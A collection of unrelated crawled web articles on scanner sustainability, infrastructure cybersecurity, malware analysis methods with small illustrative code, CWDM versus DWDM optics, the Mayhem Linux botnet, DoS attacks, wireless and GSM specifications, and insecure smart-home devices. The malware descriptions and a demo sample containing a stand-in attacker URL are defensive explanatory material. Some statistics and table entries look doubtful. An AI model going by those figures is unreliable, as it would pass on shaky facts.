Making sustainable decisions doesn’t stop when your equipment is out of date or non-functional. Implementing responsible end-of-life (EOL) practices for hardware is critical to maintaining a healthy environment. Kodak Alaris designs sustainable products to help our customers pursue greener ways of doing business and inspire other companies in the industry to do the same.
Eco-friendly waste management for equipment, batteries, and packaging is a high priority. Kodak Alaris is compliant with laws in both Waste Electrical and Electronic Equipment (WEEE) and Restriction of the use of certain Hazardous Substances (RoHS), which originated in the European Union and are legislatively linked.
Whether you represent a government organization or a business, or if you’re looking for high-performance scanners for your own use, you can be assured that Kodak Alaris prioritizes environmentally responsible product management to help every individual and organization reach their sustainability goals.
For more information on making sustainable business decisions and how Kodak Alaris can help, contact us using the following information or by completing the form below.
Service and support: 1-800-525-6325
Sales inquiries: 1-800-944-6171 | <urn:uuid:e4e4c6db-2450-4acc-9a13-7a0dd8418f5c> | CC-MAIN-2022-40 | https://www.alarisworld.com/en-gb/insights/articles/how-document-scanners-help-businesses-meet-sustainability-goals | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00165.warc.gz | en | 0.934636 | 1,203 | 2.78125 | 3 |
The global growth of smart technology is booming across homes, industries, cities, and infrastructure. Its advantages are exponential and its uses vast; technologies range from home sensors and mainstream wearables, right through to connected vehicles and smart architecture.
Its ability to use big data, automate energy use, and create cost efficiencies means smart technology is becoming increasingly prevalent in national infrastructures. Operators are turning to smart tech as a solution to automating processes and unlocking the potential of data, helping them to build smart buildings, cities, and grids. The smart grid market alone is expected to reach a value of over $92.1 billion by 2026, representing a CAGR of 17.76% since 2019.
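Since a compound annual growth rate (CAGR) compounds each year, the quoted figures imply a 2019 base of roughly $29 billion, which a quick Python check confirms (the forecast itself is the cited report's; this is only an arithmetic sanity check):

```python
# CAGR relationship: value_end = value_start * (1 + rate) ** years
rate = 0.1776          # 17.76% CAGR, as quoted
years = 2026 - 2019    # 7 years of compounding
value_2026 = 92.1      # billions of dollars

implied_2019 = value_2026 / (1 + rate) ** years
print(f"Implied 2019 market size: ${implied_2019:.1f}B")
```

In other words, the forecast amounts to the market roughly tripling over seven years.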
However, with great power comes great responsibility, and these initiatives can only truly succeed when they are underpinned by effective cybersecurity measures.
The attack on critical infrastructure
Governments around the world are on a mission to make national infrastructure faster, smarter, and greener. Unfortunately, this is something cybercriminals have quickly used to their advantage and attacks on critical infrastructure are on the rise.
However, it is important to recognize that these attacks aren’t always driven by opportunistic cybercriminals. More frequently, attacks turn out to be highly strategic, state-sponsored assaults, which aim to cause immense societal, economic, and environmental damage.
In fact, strikes on critical infrastructure can be considered modern-day warfare. Rather than sending in troops on the ground, attackers are gathering digital soldiers to hit their enemies where it hurts. As well as impacting civilians and damaging society, these assaults proactively seek to cause extreme environmental damage.
As well as the immense threat to society, this level of cyber warfare significantly impedes sustainability initiatives and could result in grave consequences for the environment.
Therefore, it is even more critical that infrastructure organizations mitigate these risks by placing cybersecurity at the heart of their digital transformation and sustainability strategies.
Even when an attack isn’t intended to cause environmental damage, there is often still significant impact on both society and the environment. This was demonstrated when a cybercriminal gang took down the Colonial Pipeline, the US’s largest fuel pipeline.
The pipeline itself moves 2.7 million barrels of refined petroleum products a day from the Gulf Coast to the East Coast, providing states along the eastern seaboard with about half of their total fuel requirements. However, the operator had to quickly take itself offline when it realized it had fallen victim to a malicious malware attack originating in Russia, causing substantial societal disruption and environmental damage.
While the hackers claimed that the attack wasn’t intended to harm society (or the environment), the consequences were still severe. Shortages in fuel supply on the East Coast drove up prices by six cents per gallon, a level not seen since 2014. Due to the disruption to supply, the US government had to relax road restrictions to enable delivery transporters to ship fuel over land more freely. Meanwhile, traffic congestion along the East Coast skyrocketed as citizens attempted to obtain fuel before it dried up. Combined with the energy consumption required to fight an attack itself, and the subsequent power needed to recover and stabilize systems, the total environmental impact will be vast.
It appears hackers gained access to the Colonial Pipeline via remote desktop software, which engineers were accessing to control systems for the pipeline from home. To add insult to injury, the operator paid the hackers $5 million in a bid to reinstate services. A costly catastrophe on all accounts.
A cyber-embedded approach
This case alone reinforces the critical need for a fully embedded cybersecurity strategy. As cities around the world become increasingly reliant on connected, sustainable infrastructure, it is simply not feasible (or responsible) to take a disjointed approach and hope for the best. Operators must adopt end-to-end solutions with a trusted partner, such as Capgemini.
Sadly, the Colonial Pipeline example isn’t unique; 99% of cyberattacks take place through the back door. That’s why it’s crucial to ensure cybersecurity is watertight across the board and to work with a partner that can advise on best practice throughout the full life cycle of cybersecurity. Only by taking this approach can national infrastructure become truly sustainable – in every sense of the word. | <urn:uuid:2270b069-e0eb-4b81-8764-1fc4b75cc8df> | CC-MAIN-2022-40 | https://www.capgemini.com/au-en/2021/07/cybersecurity-the-linchpin-of-sustainable-infrastructure/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00165.warc.gz | en | 0.948318 | 877 | 3.1875 | 3 |
These days many enterprises encounter suspicious links and websites that are ready to steal their data. This isn't very surprising, as cyber crimes have increased tremendously in the last few years. Last year, Zscaler's platform detected and blocked 2.7 million encrypted phishing attacks per month. It also found that 32 percent of newly registered, potentially malicious domains were using SSL certificates. These fraudulent activities cannot be stopped completely, but companies can counter them effectively through malware analysis.
But before we get to malware analysis and the different tools for it, let's define malware. Malware is a program or file that is harmful to a computer: it has the potential to steal, delete, or alter sensitive data stored on the system. Such malicious software can also monitor the user's activity within the system.
Different forms of malware harm the user in different ways: in some cases malware causes little damage, while in others it is disastrous. Malware can spread by almost any means, physical or virtual. The most common entry points are USB transfers and clicks on phishing emails.
One of the most effective ways to counter malware attacks is malware analysis. How does it work? Dedicated malware analysis software helps users detect malware and investigate suspicious files and attacks.
Malware analysis is the process of scanning suspicious files and URLs to understand their behavior and purpose. If the analysis shows that a sample is harmful, the user can avoid it or stay alert to the attack.
Malware analysis is done in various ways i.e. static, dynamic, or hybrid, depending upon the choice and situation.
1. Static Malware Analysis
In static malware analysis, there is no need to run the code, as files are examined thoroughly to identify any signs of malicious content. This type of analysis has been useful in determining malicious infrastructure, libraries, or packed files.
The best malware analysis tools for static analysis can be disassemblers or network analyzers, as these tools can scan the malware without running the code. But, one demerit of using this analysis is that it fails to detect some sophisticated malware that has malicious runtime behavior.
2. Dynamic Malware Analysis
This type of analysis is now used by enterprises to study malicious files more thoroughly. It is conducted in a safe environment called a sandbox, where suspected malicious codes are operated. In this closed system, the analyzers can closely inspect the malware, without letting the malware corrupt the system. Certain dynamic malware analysis tools are best at uncovering the truth of malware files by giving analyzers deeper visibility. But, sometimes dynamic malware analysis fails if the adversaries have hidden the code and let the code remain hidden until favorable conditions arise.
3. Hybrid Malware Analysis
Both static and dynamic malware analysis have their drawbacks, but better scanning results can be obtained if the two methods are combined. With hybrid malware analysis, even hidden code can be detected. Hybrid analysis has proved very useful for scanning and detecting even the most sophisticated malware.
Malware analysis isn't a single-step process, as it includes several stages to complete the analysis of a suspected file. Let’s take a look at the stages step-by-step.
1. Static Properties Analysis
Static properties of malware are the strings embedded in the malware code, header details, metadata, embedded resources, and other elements. Detecting them is essential for creating Indicators of Compromise (IOCs). These elements can be collected very quickly because there is no need to run the code.
Another reason why static properties analysis is the first step is that its results indicate whether a further investigation is required or not.
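The string-extraction part of this step is essentially what the Unix `strings` utility does, combined with hashing for IOC sharing. A minimal illustrative sketch follows; the function name and the fake sample bytes are invented for this example and do not come from any particular analysis tool.

```python
import hashlib
import re

def static_properties(data: bytes, min_len: int = 4):
    """Extract basic static properties from a file's raw bytes:
    cryptographic hashes (useful as IOCs) and printable ASCII
    strings, where URLs, IPs, and library names often hide."""
    strings = [s.decode("ascii")
               for s in re.findall(rb"[ -~]{%d,}" % min_len, data)]
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "strings": strings,
    }

# A fake "sample" with an embedded URL, for demonstration only.
sample = b"\x7fELF\x00\x01" + b"http://evil.example/payload" + b"\x00\x90\x90"
props = static_properties(sample)
print(props["sha256"][:16], props["strings"])
```

Real triage pipelines add PE/ELF header parsing and metadata extraction on top of this, but the hash-plus-strings pass is usually the first thing run against a new sample.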
2. Interactive Behavior Analysis
In behavior analysis, a sample of the malware is observed and interacted with by running its code. While the code runs, the analyst studies the sample's registry, file system, process, and network activities. If the malware is suspected of specific harmful behavior, the analyst manipulates the sample to test that theory. This is why professional analysts are needed for behavior analysis.
3. Fully Automated Analysis
This stage is one of the quickest and easiest ways to assess any suspected file, link, or website. In this analysis, it can be quickly determined whether the malware can infiltrate the network. It also produces easy-to-read reports so the security team can take further steps as quickly as possible. This step requires fully automated tools to determine the suspicious nature of malware.
4. Manual Code Reversing
Code reversing is a special skill among analysts but it is quite tedious.
This is the final stage of malware analysis in which the analysts reverse engineer the code with the use of debuggers, disassemblers, compilers and more. They then use this code to determine the logic of the malware algorithm. This helps them understand the hidden abilities of the malware.
Malware attacks are among the most common tactics cybercriminals use, but with the advancement of technology, a suspicious attack can be detected and countered in advance. So it is always advisable to click a suspicious link only after verifying its authenticity.
REVERSS is a dynamic malware analysis tool provided by Anlyz. This advanced malware analysis tool uses reverse engineering techniques to provide real-time analytics and protect your system against cyber threats. Get in touch with us to know more about the features of REVERSS. | <urn:uuid:0f1e6b32-17f6-4164-8a87-69ac6f61ec2f> | CC-MAIN-2022-40 | https://anlyz.co/countering-enterprise-malware-blindness/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00165.warc.gz | en | 0.920089 | 1,142 | 2.59375 | 3 |
CWDM vs DWDM: What’s the Difference?
When dealing with OTN (Optical Transport Network), there are two main types of Wavelength Division Multiplexing (WDM) systems: Coarse Wavelength Division Multiplexing (CWDM) and Dense Wavelength Division Multiplexing (DWDM). As two modern WDM technologies, they are both used for increasing the bandwidth of fiber by combining optical signals of different wavelengths on one strand of fiber. But CWDM vs DWDM, what are their differences?
WDM, CWDM and DWDM Wiki
To better understand the difference between CWDM and DWDM, we’d better get to know what’s WDM, CWDM, and DWDM in the first place.
WDM is a technology for transporting large amounts of data between sites. It increases bandwidth by allowing different data streams to be sent simultaneously over a single optical fiber network. In this way, WDM maximizes the utilization of fiber and helps to optimize network investments.
What’s CWDM and DWDM?
As mentioned above, CWDM and DWDM are two technologies developed from WDM, but with different wavelength patterns and applications. CWDM is a flexible technology that can be deployed on most types of fiber networks. It is typically deployed in point-to-point topology in enterprise networks and telecom access networks. DWDM, by contrast, began as an option for metropolitan networks; it is now also used for interconnecting data centers and for financial services networks, and is often deployed in a ring topology.
CWDM vs DWDM, What Are Their Differences?
CWDM and DWDM are both effective methods to solve the increasing bandwidth capacity of information transmission at present. But they differ from each other in many aspects. Below parts will introduce some differences between CWDM and DWDM systems.
CWDM vs DWDM: Channel Spacing
The channel spacing is defined to be the nominal difference in frequency or wavelength between two adjacent optical channels. CWDM has a wider spacing than DWDM. It is able to transport up to 18 CWDM wavelengths with a channel spacing of 20nm in the spectrum grid from 1271nm to 1611nm. DWDM can carry 40, 80, or up to 160 wavelengths with a narrower spacing of 0.8/0.4nm (100 GHz/50 GHz grid). Its wavelengths are from 1525nm to 1565nm (C band) and 1570nm to 1610nm (L band).
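Both grids are easy to compute. The sketch below assumes the standard ITU anchor of 193.1 THz for the DWDM grid and the 1271-1611 nm CWDM ladder described above; the function names are ours, not part of any library.

```python
C = 299_792_458  # speed of light, m/s

def dwdm_channel(n: int, spacing_ghz: float = 100.0):
    """Center frequency (THz) and wavelength (nm) of DWDM channel n
    on the ITU grid anchored at 193.1 THz; n may be negative."""
    f_thz = 193.1 + n * spacing_ghz / 1000.0
    wavelength_nm = C / (f_thz * 1e12) * 1e9
    return f_thz, wavelength_nm

def cwdm_wavelengths():
    """The 18 CWDM center wavelengths: 1271-1611 nm on a 20 nm grid."""
    return [1271 + 20 * k for k in range(18)]

f, lam = dwdm_channel(0)
print(f"DWDM n=0: {f:.1f} THz, about {lam:.2f} nm")
print(cwdm_wavelengths()[0], cwdm_wavelengths()[-1])  # 1271 1611
```

Note that DWDM channels are defined in frequency (fixed GHz spacing), while CWDM channels are defined in wavelength (fixed 20 nm spacing), which is why the two grids look so different.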
CWDM vs DWDM: Transmission Distance
Since DWDM wavelengths sit within the band where optical amplifiers operate, DWDM signals can be amplified and therefore reach a much longer distance than CWDM. CWDM signals cannot be amplified in the same way, which limits the maximum reach of CWDM to about 160 km, while an amplified DWDM system can go much further.
CWDM vs DWDM: Modulation Laser
CWDM systems use uncooled lasers while DWDM systems use cooled lasers. A cooled laser employs temperature tuning, which ensures better performance, higher safety, and a longer lifespan for the DWDM system. But it also consumes more power than the electronically tuned uncooled lasers used in a CWDM system.
CWDM vs DWDM: Cost
Because the temperature distribution is nonuniform across a very wide wavelength range, temperature tuning is difficult to realize, so the cooled-laser technique increases the cost of a DWDM system. Furthermore, DWDM devices are typically four or five times more expensive than their CWDM counterparts. However, the price of a DWDM transceiver is about 20-25% less than a CWDM transceiver on account of the popularization of DWDM.
CWDM vs DWDM: Advantages and Disadvantages
As mentioned above, the primary difference between DWDM and CWDM is the channel spacing (CWDM has almost 100 times wider channel spacing). This makes CWDM a simpler technology, resulting in advantages and disadvantages of the different systems with regard to cost, performance, and so on.
CWDM Advantages and Disadvantages
|CWDM Advantages|CWDM Disadvantages|
|Lower cost and power consumption (uncooled lasers)|Limited reach (about 160 km, no amplification)|
|Simpler, flexible deployment on most fiber types|Fewer channels (up to 18 wavelengths)|
DWDM Advantages and Disadvantages
|DWDM Advantages|DWDM Disadvantages|
|Many tightly spaced channels (40, 80, or up to 160 wavelengths)|Higher equipment cost|
|Long-haul reach with amplification|Higher power consumption (cooled lasers)|
CWDM vs DWDM, Which Do You Prefer?
The tremendous demand for more bandwidth has triggered the DWDM's development, which makes it more favored in the market. And it has experienced great advancement in cost reduction. However, CWDM still has the price advantage for connection rates below 10G and for short distances. With low data rates, it is currently more feasible. In this way, CWDM and DWDM each will provide a unique “fit” in the OTN network, and will complement rather than replace each other in the future. | <urn:uuid:ced2ab01-c0ac-4086-9b7f-46198df4b5f8> | CC-MAIN-2022-40 | https://community.fs.com/blog/what-is-the-difference-between-dwdm-and-cwdm-optical-technologies.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00165.warc.gz | en | 0.945634 | 1,096 | 3.390625 | 3 |
Security experts at Russian Internet company Yandex have detected a new strain of malware dubbed Mayhem which is targeting server based on Linux and FreeBSD OSs.
The malware Mayhem was designed to infect servers running the popular distributions and use them as part of a botnet, even without the need of any root privileges.
Mayhem isn’t a totally new malware, it was first discovered in April 2014, and according to the experts at Yandex, it is linked to the “Fort Disco” brute-force campaign uncovered by Arbor Networks in 2013 that compromised more than 6000 websites based on popular CMSs.
Mayhem is considered a dangerous cyber threat, it has a modular structure which is able to load numerous payload to compromise targeted systems.
The attackers use a sophisticated PHP script to compromise the servers, it still has a low detection rate with the principal antivirus products on the market. Mayhem scans the internet searching for vulnerable servers, the rfiscan.so for example is used to discover servers hosting websites with a remote file inclusion (RFI) vulnerability, once the malware exploits an RFI it will run a PHP script on a victim.
The experts have discovered that more than 1,400 Linux and FreeBSD servers have been compromised worldwide, but this could be just the tip of the iceberg, considering that Mayhem mainly infects machines that are not kept up to date with security patches. The majority of infected servers are located in the USA, Russia, Germany and Canada.
“In the *nix world, autoupdate technologies aren’t widely used, especially in comparison with desktops and smartphones. The vast majority of web masters and system administrators have to update their software manually and test that their infrastructure works correctly,”
“For ordinary websites, serious maintenance is quite expensive and often webmasters don’t have an opportunity to do it. This means it is easy for hackers to find vulnerable web servers and to use such servers in their botnets.” said the researchers in a technical report published by Virus Bulletin.
“As stated previously, the malware uses a hidden file system to store its files. The file system comprises a file that is created during the initialization. The filename of the hidden file system is defined in the configuration, but its name is usually ‘.sd0’. To work with this file system an open-source library ‘FAT 16/32 File System Library’, is used. The library contains code to create and work with the FAT file system, but it is not used in the original form – some functions have been modified to support encryption. Every block is encrypted with 32 rounds of XTEA algorithm in ECB mode and the encryption key differs from block to block.
The hidden file system is used to store plug-ins and files with strings to process: lists of URLs, usernames, passwords, etc.” states an interesting report published by malwaremustdie.org.
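The per-block encryption the report describes (32 rounds of XTEA in ECB mode) can be illustrated with a textbook implementation of the cipher itself. This is a generic XTEA sketch, not Mayhem's actual code, and the key and plaintext below are made-up examples.

```python
MASK = 0xFFFFFFFF          # keep arithmetic in 32 bits, as in C
DELTA = 0x9E3779B9         # the standard XTEA key-schedule constant

def xtea_encrypt(v0, v1, key, rounds=32):
    """Encrypt one 64-bit block (two 32-bit words) with a 128-bit key
    (four 32-bit words) using the standard XTEA schedule."""
    s = 0
    for _ in range(rounds):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + key[s & 3]))) & MASK
        s = (s + DELTA) & MASK
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + key[(s >> 11) & 3]))) & MASK
    return v0, v1

def xtea_decrypt(v0, v1, key, rounds=32):
    """Inverse of xtea_encrypt: run the schedule backwards."""
    s = (DELTA * rounds) & MASK
    for _ in range(rounds):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + key[(s >> 11) & 3]))) & MASK
        s = (s - DELTA) & MASK
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + key[s & 3]))) & MASK
    return v0, v1

key = (0x0123, 0x4567, 0x89AB, 0xCDEF)          # example 4-word key
ct = xtea_encrypt(0xDEADBEEF, 0xCAFEBABE, key)
print(xtea_decrypt(*ct, key) == (0xDEADBEEF, 0xCAFEBABE))  # round-trip works
```

In ECB mode each 8-byte block is encrypted independently with this function, which is exactly why Mayhem's trick of changing the key from block to block matters: it compensates for ECB's well-known weakness of producing identical ciphertext for identical blocks.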
The modular structure of Mayhem is alarming security experts, who believe the bad actors behind the malicious campaign are developing new plugins to improve the botnet. According to the researchers, an exploit for the Heartbleed vulnerability has also been found.
Security Affairs – (Mayhem, Linux) | <urn:uuid:ef73154a-23f0-454f-af9d-2f27e2f05a5e> | CC-MAIN-2022-40 | https://securityaffairs.co/wordpress/26970/malware/mayhem-malware-linux-freebsd.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00165.warc.gz | en | 0.943023 | 661 | 2.515625 | 3 |
You may have heard news reports about popular websites such as CNN, Amazon and Yahoo! being taken down by a DoS attack, but have you ever wondered what DoS means?
This common tech term stands for “denial-of-service,” where an attacker attempts to prevent legitimate users from accessing a website entirely or slowing it down to the point of being unusable. The most common and obvious type of DoS attack occurs when an attacker “floods” a network with useless information.
When you type a URL for a particular website into your browser, you are sending a request to that site’s computer server to view the page. The server can only process a certain number of requests at once, so if an attacker overloads the server with requests, it can’t process your request. The flood of incoming messages to the target system essentially forces it to shut down, thereby denying access to legitimate users.
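One common way servers defend against this kind of flood is rate limiting, for example with a token bucket: each request spends a token, tokens refill at a fixed rate, and requests beyond the refill rate are rejected. Below is a minimal illustrative sketch, not any particular product's implementation.

```python
import time

class TokenBucket:
    """Allow at most `rate` requests per second, with bursts up to `capacity`."""

    def __init__(self, rate: float, capacity: float):
        self.rate = rate            # tokens added per second
        self.capacity = capacity    # maximum burst size
        self.tokens = capacity
        self.last = time.monotonic()

    def allow(self) -> bool:
        now = time.monotonic()
        # Refill tokens for the time elapsed since the last request.
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False                # over the limit: drop or delay the request

bucket = TokenBucket(rate=10, capacity=5)
burst = [bucket.allow() for _ in range(20)]   # a sudden flood of 20 requests
print(burst.count(True))                      # only the first few get through
```

Real deployments apply limits per client address and combine them with upstream filtering, since a single server-side bucket cannot absorb a large distributed flood on its own.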
A distributed denial-of-service (DDoS) attack is one where a site is attacked not by just one person or machine, but by two or more. These attacks are usually carried out by cybercriminals using botnets (remote computers under their control) to bombard the site with requests. Cybercriminals create botnets by infecting a collection of computers (sometimes hundreds or thousands) with malware that gives them control of the machines, allowing them to stage their attack.
There is also an unintentional DoS where a website ends up denied, not due to a deliberate attack by a single individual or group of individuals, but simply due to a sudden enormous spike in popularity. This can happen when an extremely popular website posts a prominent link to a second, less well-prepared site, for example, as part of a news story. The result is that a significant proportion of the primary site’s regular users–potentially hundreds of thousands of people—click that link in the space of a few hours, having the same effect on the target website as a DDoS attack. When Michael Jackson died in 2009, websites such as Google and Twitter slowed down or even crashed.1
While this can be an inconvenience to you, as you may not be able to complete transactions or access your banking site, there’s no real danger for you. But unbeknownst to you, your computer or mobile device could be part of the botnet that is causing a DDos attack.
To make sure you’re not part of a DDoS attack:
- Pay attention if you notice that your Internet connection is unusually slow or you can’t access certain sites (and that your Internet connection is not down)
- Make sure you have comprehensive security installed on all your devices, like McAfee LiveSafe™ service
- Be careful when giving out your email address, clicking on links and opening attachments, especially if they are from people you don’t know
- Stay educated on the latest tactics that hackers and scammers use so that you’re aware of tricks they use
1 “Web slows after Jackson’s death”. BBC News
Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats. | <urn:uuid:901d6697-2a0c-4a34-bdf7-a08adca61377> | CC-MAIN-2022-40 | https://www.mcafee.com/blogs/consumer/denial-service-attack | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00165.warc.gz | en | 0.93371 | 678 | 3.53125 | 4 |
Wireless Local-Area Networks, known as Wireless LAN or simply WLAN technology, provide network connections over microwave links typically around 2.4 and 5 GHz. Most of what is called WLAN today is based on the IEEE 802.11 family of standards and marketed as Wi-Fi.
Another general family of wireless network technology is based on digital mobile telephony, carrying IP networking over the worldwide mobile telephony internetwork. Look here for an example of mobile IP networking in Bulgaria, where in 2011 they had the third-fastest Internet service in the world.
The U.S. Federal Communications Commission released the 2.4 GHz ISM band for unlicensed use in 1985. (that is, the Industrial, Scientific, and Medical radio bands used by microwave ovens, medical diathermy, and industrial RF heating)
By 1991 NCR and AT&T developed an 802.11 precursor, intended for use by cash register systems. The technology was called WaveLAN and provided 1 and 2 Mbps data rates.
802.11b was the first widely accepted wireless networking standard. It appeared around 1999. 802.11b uses the 2.4 GHz band and provides about 11 Mbps data rate. The band is divided into channels that are 22 MHz wide and spaced every 5 MHz, with significant overlap.
Only channels 1 through 11 are allowed in the U.S. and similarly regulated nations, including all of North America and parts of Central and South America. Channels 1, 6, and 11 are used in these regions, as they are the only way to use three non-overlapping channels. European nations commonly use channels 1, 5, 9, and 13, four channels with some overlap.
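The channel plan above follows a simple formula: in the 2.4 GHz band, channel n is centered at 2407 + 5n MHz, with channel 14 (Japan only) a special case at 2484 MHz. A quick sketch, using our own helper function rather than any standard API, shows why 1, 6 and 11 do not overlap:

```python
def wifi_channel_center_mhz(channel: int) -> int:
    """Center frequency of a 2.4 GHz Wi-Fi channel in MHz.
    Channels 1-13 sit every 5 MHz starting at 2412 MHz;
    channel 14 is a special case at 2484 MHz."""
    if channel == 14:
        return 2484
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    raise ValueError("not a 2.4 GHz channel")

# Channels 1, 6, 11 are 25 MHz apart, wider than the 22 MHz
# channel width, so their spectra do not overlap.
for ch in (1, 6, 11):
    print(ch, wifi_channel_center_mhz(ch))  # 2412, 2437, 2462
```

The same arithmetic explains the European 1/5/9/13 plan: those centers are only 20 MHz apart, which is why a small amount of overlap remains with 22 MHz-wide channels.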
Since 802.11b and 802.11g use the shared 2.4 GHz ISM band, they may suffer interference from microwave ovens, cordless telephones, cordless headphones, and Bluetooth devices. DSSS and OFDMA (that is, Direct-Sequence Spread Spectrum and Orthogonal Frequency-Division Multiple Access) helps to limit the interference.
802.11a and 802.11g came out next. 802.11a (1999) uses the 5 GHz band, while 802.11g (2003) stays in the 2.4 GHz band. Their OFDM modulation schemes provide data rates of 54 Mbps.
802.11n appeared in 2009. It provides data rates up to 600 Mbps over four spatial streams, with users getting single-stream links up to 150 Mbps.
802.11ac appeared in 2013, providing single spatial streams with link speeds up to 866 Mbps. The 802.11ac standard specifies up to 8 spatial streams, meaning that a single user could get a total data rate of 6.97 Gbps.
The other standards, c-f, h, and j, are amendments that extend the scope of existing standards, and in some cases make corrections.
802.11ax is scheduled for release in 2019. It is expected to provide around 10 Gbps data rates.
WiFi and WiMax Characteristics
|Standard|Frequency|Max data rate|Spectrum sharing|Modulation|
|802.11a|5 GHz|54 Mbps|OFDMA|BPSK, QPSK, 16-QAM, 64-QAM|
|802.11g|2.4 GHz|54 Mbps|OFDMA|BPSK, QPSK, CCK|
|802.11ac|5 GHz|88-866 Mbps|OFDMA|BPSK, QPSK, 16-QAM, 64-QAM, 256-QAM|
|802.11ad|60 GHz|6.76 Gbps|SC, OFDMA|BPSK, QPSK, 16-QAM, 64-QAM|
| | |27-569 Mbps|SC, OFDMA|BPSK, QPSK, 16-QAM, 64-QAM, 256-QAM|
| | |1-16 Mbps|SC, OFDMA|BPSK, QPSK, 16-QAM, 64-QAM|
|802.11ax|2.4/5 GHz|1201 Mbps|OFDMA|BPSK, QPSK, 16-QAM, 64-QAM, 256-QAM, 1024-QAM|
|Bluetooth (802.15.1)|2.4-2.484 GHz|1-3 Mbps|FHSS|GFSK, DQPSK, 8DPSK|
|WiMAX (802.16)|2.5, 3.5, 5.2, 5.8 GHz|70 Mbps|OFDMA|BPSK, QPSK, 16-QAM, 64-QAM|
|WiMAX (802.16e)|2.3, 2.5, 3.3, 5 GHz|70 Mbps|SOFDMA|BPSK, QPSK, 16-QAM, 64-QAM|
At 5 GHz, devices in the US may operate at 5.250-5.350 GHz and 5.470-5.725 GHz. In Europe, 5.150-5.725 GHz is used.
5G wireless networks will use millimeter-wave spectrum. WRC-15, the World Radiocommunication Conference held in November 2015, proposed these mm-wave bands for study: 24.25-27.5, 31.8-33.4, 37-40.5, 40.5-42.5, 45.5-50.2, 50.4-52.6, 66-76, and 81-86 GHz.
Digital Mobile Telephone Specifications
|System|Band, MHz|Uplink, MHz|Downlink, MHz|Channel Number|Regions of Use|
|GSM 400|450|450.4 — 457.6|460.4 — 467.6|259 — 293|Tanzania|
|GSM 400|480|478.8 — 486.0|488.8 — 496.0|306 — 340|Tanzania|
|GSM 850|850|824.0 — 849.0|869.0 — 894.0|128 — 251|USA, Canada, many other countries in the Americas.|
|GSM 900 (P-GSM)|900|890.0 — 915.0|935.0 — 960.0|1 — 124|Europe, Middle East, Africa, most of Asia, Brazil, Falklands, St Pierre & Miquelon, some Caribbean countries|
|GSM 900 (E-GSM)|900|880.0 — 915.0|925.0 — 960.0|0 — 124, 975 — 1023|Europe, Middle East, Africa, most of Asia|
|GSM 900 (R-GSM)|900|876.0 — 915.0|921.0 — 960.0|0 — 124, 955 — 1023|Europe, Middle East, Africa, most of Asia|
|GSM 1800|1800|1710.0 — 1785.0|1805.0 — 1880.0|512 — 885|Europe, Middle East, Africa, most of Asia, Brazil, Uruguay, some Caribbean countries|
|GSM 1900|1900|1850.0 — 1910.0|1930.0 — 1990.0|512 — 810|USA, Canada, many other countries in the Americas.|
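The channel numbers (ARFCNs) in the table map to carrier frequencies by a fixed formula: for P-GSM 900, the uplink is 890 + 0.2n MHz with a 45 MHz duplex offset. The sketch below covers two of the bands above; the helper function is our own, and note that channel numbers 512-810 are ambiguous between GSM 1800 and GSM 1900, so in practice the band must be known from context.

```python
def gsm_arfcn_to_mhz(arfcn: int):
    """Map an ARFCN (channel number) to (uplink, downlink) carrier
    frequencies in MHz for the P-GSM 900 and GSM 1800 bands."""
    if 1 <= arfcn <= 124:            # P-GSM 900, 45 MHz duplex spacing
        up = 890.0 + 0.2 * arfcn
        return up, up + 45.0
    if 512 <= arfcn <= 885:          # GSM 1800, 95 MHz duplex spacing
        up = 1710.2 + 0.2 * (arfcn - 512)
        return up, up + 95.0
    raise ValueError("ARFCN outside the bands shown here")

print(gsm_arfcn_to_mhz(1))    # (890.2, 935.2)
print(gsm_arfcn_to_mhz(124))  # (914.8, 959.8)
```

The 200 kHz step is the GSM carrier spacing, which is why 124 channels exactly fill the 25 MHz P-GSM allocation shown in the table.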
Wireless Frequency and Encryption Specifications
|Technology|Frequencies|Encryption|
|GPRS (2G)|GSM 850/1900 MHz|GEA2/GEA3/GEA4|
|EDGE (2G)|GSM 850/1900 MHz|A5/4, A5/3|
|UMTS (3G) HSDPA/HSUPA|850/1700/1900 MHz|USIM|
|LTE (4G)|700-2600 MHz|SNOW stream cipher|
|OFDMA||Orthogonal Frequency-Division Multiple Access|
|SOFDMA||Scalable Orthogonal Frequency-Division Multiple Access|
|BPSK||Binary Phase-Shift Keying|
|QPSK||Quadrature Phase-Shift Keying|
|QAM||Quadrature Amplitude Modulation|
|CCK||Complementary Code Keying| | <urn:uuid:dae958c9-6408-4376-99be-4e35c4db29b6> | CC-MAIN-2022-40 | https://cromwell-intl.com/networking/wlan-specs.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00366.warc.gz | en | 0.742454 | 2,254 | 3.65625 | 4 |
NEWSBYTE: Researchers at Ben Gurion University in Israel have found that a variety of off-the-shelf smart home devices, including security cameras, doorbells, and baby monitors, are extremely easy to hack.
“It is truly frightening how easily a criminal, voyeur or pedophile can take over these devices,” said Dr Yossi Oren, a senior lecturer in BGU’s Department of Software and Information Systems Engineering.
BGU researchers discovered several ways hackers can take advantage of poorly secured devices. They discovered that similar products under different brands share the same common default passwords.
